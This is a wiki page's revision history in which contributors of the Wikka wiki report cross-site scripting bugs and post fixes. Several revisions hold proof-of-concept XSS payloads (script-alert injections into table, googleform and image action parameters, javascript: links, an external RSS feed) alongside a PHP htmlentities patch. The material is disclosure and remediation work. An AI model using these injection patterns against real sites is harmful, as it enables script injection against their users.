Revision history for MySandbox
Revision [19443]
Last edited on 2008-01-28 00:16:02 by JavaWoman [Modified links pointing to docs server]No Differences
Revision [17834]
Edited on 2007-12-12 13:14:37 by JavaWoman [prevent function references looking as page links]Additions:
I just patched up the actions to feed the appropriate items through ""ReturnSafeHTML()"".
Deletions:
Additions:
for ($a = 0; $a < count($matches[0]); $a++) {
Deletions:
Additions:
for ($a = 0; $a < count($matches[0]); $a ) {
Deletions:
Additions:
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of romans exploit's hook in.
Hey Dreck, I do have a request.
although the problem is solved, moved the stuff to CachingRSS and added some remarks
thanks ;) and (of course) thanks for the hint! --DreckFehler
Hey Dreck, I do have a request.
although the problem is solved, moved the stuff to CachingRSS and added some remarks
thanks ;) and (of course) thanks for the hint! --DreckFehler
Deletions:
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Update: Nevermind the plea. I'm going to use PHP's parse_url().
test test2
Additions:
Good work, guys =)
-- RomanIvanov
-- RomanIvanov
Additions:
test test2
Deletions:
Additions:
test
Additions:
Update: Nevermind the plea. I'm going to use PHP's parse_url().
Additions:
----
Yeah, that Roman guy is a big trouble-maker. ;)
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Yeah, that Roman guy is a big trouble-maker. ;)
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Additions:
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
Additions:
any suggestions how to address this issue?
here is mine (which doesn't fix the rss-exploit, but i seem to have some more general probs with the rss-action in my wikka-installation. and this exploit isn't located in the parameter-handling. it has to be handled in the rss-action itself):
%%(php)<?
if (is_array($matches)) {
for ($a = 0; $a < count($matches[0]); $a++) {
$vars[$matches[1][$a]] = htmlentities($matches[2][$a], ENT_QUOTES);
}
}
$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);
?>%%
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
i hate that guys who cause problems but omit the solutions ;)
here is mine (which doesn't fix the rss-exploit, but i seem to have some more general probs with the rss-action in my wikka-installation. and this exploit isn't located in the parameter-handling. it has to be handled in the rss-action itself):
%%(php)<?
if (is_array($matches)) {
for ($a = 0; $a < count($matches[0]); $a++) {
$vars[$matches[1][$a]] = htmlentities($matches[2][$a], ENT_QUOTES);
}
}
$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);
?>%%
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
i hate that guys who cause problems but omit the solutions ;)
Additions:
====rss action has an XSS and also supposed unsafe because any malefactor can generated BIG amount of incoming traffic, which may be expensive.====
Deletions:
Additions:
{{rss url="http://ar.sky.ru/xss.xml" cache="cachef.xml"}}
Deletions:
Additions:
Hmm.
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}
Additions:
====table action has an XSS.====
====googleform action has an XSS.====
====googleform action has an XSS.====
Deletions:
Additions:
table action has an XSS.
{{googleform q="'><script>alert(2)</script>"}}
{{googleform q="'><script>alert(2)</script>"}}
Additions:
{{table cellpadding="'><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellspacing="><script>alert(1);</script>"}}
Deletions:
seems to be it's an XSS security hole.
// Fixed. 5/8/04 - JsnX//
It's not last XSS bug here.
// Do you still see others? 5/8/04 - JsnX//
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.
Deletions:
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
Additions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
Additions:
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.
For more, please send me your formatters/* files.
Deletions:
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar
Additions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar
Additions:
// Fixed. 5/8/04 - JsnX//
// Do you still see others? 5/8/04 - JsnX//
// Do you still see others? 5/8/04 - JsnX//
Additions:
{{image url="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images\dvd" title="javascript:alert('1')"}}
Deletions:
Additions:
It's not last XSS bug here.
Additions:
seems to be it's an XSS security hole.